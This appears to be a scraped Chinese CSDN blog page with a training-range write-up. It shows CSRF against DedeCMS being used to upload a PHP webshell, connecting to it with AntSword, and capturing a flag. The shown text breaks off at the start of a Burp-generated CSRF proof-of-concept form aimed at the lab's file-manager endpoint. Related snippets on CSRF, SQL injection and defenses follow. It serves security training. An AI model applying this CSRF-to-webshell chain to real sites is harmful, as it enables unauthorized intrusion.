掌控者靶场CSRF跨站伪造请求

最新推荐文章于 2024-05-13 20:27:32 发布
最新推荐文章于 2024-05-13 20:27:32 发布
阅读量706 收藏 3
点赞数 1
分类专栏: 渗透测试 文章标签: 渗透测试 csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhaoxz1985/article/details/118829414
版权
本文详细介绍了如何在掌控者靶场中利用CSRF(跨站请求伪造)漏洞进行文件上传,并通过PHP后门进行远程控制。在过程中遇到了编码问题导致的404错误,通过调整PHP代码的编码方式成功解决了问题,最终通过蚁剑连接并获取到Flag。
摘要由CSDN通过智能技术生成

0x01 前言

这是掌控者靶场-训练营-漏洞组合利用靶场的第2道题。主要是利用CSRF跨站请求漏洞,上传php木马,再通过菜刀、蚁剑、哥斯拉等工具,连接php后门,通过题干,找到Flag。

0x02 CSRF跨站请求伪造

Cross-site request forgery,简称为CSRF,说直白点就是伪造请求、欺骗点击、达成目的。

图片引用自百度图片,若有侵权请联系我删除,3Q。

0x03 利用过程及踩坑

从传送门直达目标站点,可以看到是DEDECMS,网站下方给出了对应版本信息,可通过在本地搭建环境,通过burp抓取上传文件动作,转换为CSRF跨站脚本,这里直接提供靶场环境的:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form id="aa" action="http://59.63.200.79:8022/csrf/dede/file_manage_control.php" method="POST">
      &
最低0.47元/天 解锁文章
二的平方
关注
专栏目录
Django CSRF跨站请求伪造防护过程解析
09-18
CSRF跨站请求伪造)是一种常见的网络安全威胁,攻击者利用用户的已登录状态,在用户不知情的情况下,通过恶意网站发起对受害者的合法网站的请求,执行非用户意愿的操作。Django框架提供了一套强大的CSRF防护机制,...
封神台-掌控者新靶场 - Kali系列4题
热门推荐
weixin_43821278的博客
03-11 1万+
靶场 - Kali系列【4题】 Kali渗透 - Sqlmap实操靶场
掌控者-封神台靶场-萌新也能找到CMS漏洞
为了低调的博客
09-15 725
这个靶场压根没有flag有的话也是错误的,因为你可以看到通关的人数,从始至终都是那一个人a通关了,在这个靶场我们可以有挺多漏洞,所以只要你发现漏洞了你就可以给你自己一个大拇指赞一下了那个flag压根找不到。由于自己懒一点这里就不写教程了都是一些很简单的漏洞大家可以尝试一下!
CSRF靶场总结
qq_51582652的博客
03-22 888
CSRF总结CSRF概述CSRF漏洞挖掘基于GET方式 的CSRFXSS攻击方式文件攻击方式基于POST方式的CSRFXSS攻击方式 CSRF概述 csrf跨站请求伪造就是伪造链接,诱导用户点击修改用户的资料,密码等内容。执行非本意的操作。Csrf侧重的是修改用户的数据,而不是盗取数据。 CSRF漏洞挖掘 当页面只有Referer请求而没有token的时候,删掉Referer还能正常请求。说明存在CSRF漏洞。 可以直接构造请求伪造去碰。 基于GET方式 的CSRF XSS攻击方式 首先先指定服务器ip
常见(XSS|CSRF)六大Web安全攻防解析
画漫画的程序员∙苏南
02-13 290
点击上方“IT平头哥联盟”,选择“置顶或者星标”与你一起成长~公众号回复[加群]与百万攻城狮并肩成长作者:浪里行舟前言在互联网时代,数据安全与个人隐私受到了前所未有的挑战,各种新奇的...
CSRF - 跨站请求伪造
weixin_46601374的博客
03-01 5716
什么是CSRF? CSRF(Cross-site request forgery)跨站请求伪造:也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。 实说白了..
CSRF跨站请求伪造,含使用教程和测试工具
05-04
CSRF跨站请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一...
掌控靶场sql-注入绕过防护getshell
xia_qin的博客
01-08 647
里面有一个flag,刚开始我还比较不相信,抱着试试的心态去给flag,没想到真是这个。这里靶场作者肯定不是这么想的,你们还可以试试照提示说的去做。先看提示,说让我们sql注入,然后获取getshell。我们先开始进行信息收集,这是第一步,也是最重要的一步。使用kali Linux的dirsearch扫描目录。结果找到了一个名叫flag.txt的文件。扫出了好多目录,其中还有后台登录目录。试试找找有没有出错的文件。
CSRF---zkaq
weixin_38237216的博客
04-02 364
1.CSRF概念与利用方式 概念:CSRF(Cross-site request forgery),中文名称:跨站请求伪造 本质:浏览器在你不知情的情况下偷偷发送了数据包,借用cookie,获取信任 XSS与CSRF的区别: XSS:窃取cookie [能获取cookie] CSRF:借用/利用cookie [不能获取,只能利用、借用] 防御方式: Token(唯一解):Cookie里面有一段随机值,和请求包里面的GET或者POST传参有关联关系 2.靶场 发现环境为dedecms 在本地搭
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 585
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合利用,成功拿到flag
掌控靶场第二章:WAF绕过
m0_56135391的博客
04-12 998
1.打开传送门 2.使用御剑或其它网站扫描工具对该页面进行扫描 扫描得到一个管理员登录界面以及疑似含有sql注入漏洞的界面 对该界面进行sql注入测试拼接语句orderby10 页面回显正常,输入order by 11,页面返回异常,验证含有10个字段 通过union拼接,查询是否含有admin表unionselect1,2,3,4,5,6,7,8,9,10fromadmin 页面提示传参错误,url中输入的sql注入语句被waf拦截,可以尝试将注入语句放入coo...
CSRF漏洞靶场笔记
矜庄寂寥的博客
11-30 964
目录简介CSRF攻击步骤CSRF靶场记录CSRF(get)CSRF(post)CSRF(token验证) 简介 CSRF(Cross-site request forgery)全称为跨转请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗器其点击恶意链接或访问包含攻击代码的网页,在受害人不知情的情况下以受害人身份享服务器发送请求(如转账、改密等)。 由于已经获取了受害者的身份认证信息,在服务器看来,所有的请求均为合法正常的 CSRF攻击步骤 下面是以修改密码为例的简略流程图
掌控安全靶场第二章:遇到阻难!绕过WAF过滤!
k1k5cn的博客
11-10 2611
最近在学习CTF,前不久发现一个还不错的靶场 封神台 - 掌控安全在线演练靶场 二话不说,开干吧 第二章:遇到阻难!绕过WAF过滤! 一、测试是否有注入点 附上链接 https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb 标题上写了是【配套课时:SQL注入攻击原理 实战演练】SQL注入, 随便点击一个新闻。在id=171后面加一个引号’,测试一下是否有SQL注入。 有弹框了,提示过滤了很多关键字。下一步考虑如何绕过这些关键字。 二、绕过WAF关键字过滤
掌控者CTF靶场练习
最新发布
WTT001的博客
05-13 478
s:3:"age";s:4:"look";突然发现png文件头有问题,修改为89 50 4E 47 0D 0A 1A 0A。得到flag:zkaq-seriaLiZeeeeeee_G_Ood。echo 'flag{一道很简单的反序列化}';打开图片发现文件损坏,直接扔到16进制编辑器。} flag{一道很简单的反序列化}保存后再次打开图片,发现flag
nginx解决CSRF安全漏洞
MRLEE1212的博客
11-10 3204
使用AppScan扫描出来安全漏洞中,出现修改referer,但是仍然可以获取请求结果,出现CSRF安全漏洞提示,修改方法如下: 防法1. 修改nginx配置文件: location /auth { valid_referers none blocked 10.100.13.55 10.100.13.55:80; if ($invalid_referer) { return 403; } proxy_set_header Host $host; proxy_set_header X-Real-IP $rem
掌控安全靶场公开课第一章第一节
养乐多的博客
01-24 439
Q:什么是显示位:A:我们在进行手工SQL注入的时候会用到ORDER BY 查询列数,然后通过UNION SELECT爆出在网页中的显示位。这个显示位指的是网页中能够显示数据的位置。举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,不能显示其他列的信息。也可以理解为网页只开放了8这个窗口,你想要查询数据库信息就必须要通过这个窗口。
掌控安全学院SQL注入靶场
qaq517384的博客
11-18 3798
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
CSRF | 跨站请求伪造(推!图文超详细!)
qq_45300786的博客
08-26 595
CSRF原理: 二.CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…造成的问题包括:个人隐私泄露以及财产安全。    做一个小实验。 注册2个账号,一个是修改过的A账号的,然后用bp做成csrf的poc 然后把这个复制下来,做成html文件。 在注册个新的账号B,啥都不要写。 然后再去访问之前我们做好的html文件,之后我们就可以看到账号B有了账号
CSRF跨站请求伪造漏洞
12-06
CSRF(Cross-site request forgery)跨站请求伪造是一种网络攻击方式,攻击者通过伪造用户请求来冒充用户身份,从而进行一些非法操作。攻击者通常会在第三方网站上设置陷阱,引诱用户点击链接或者访问页面,从而触发...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值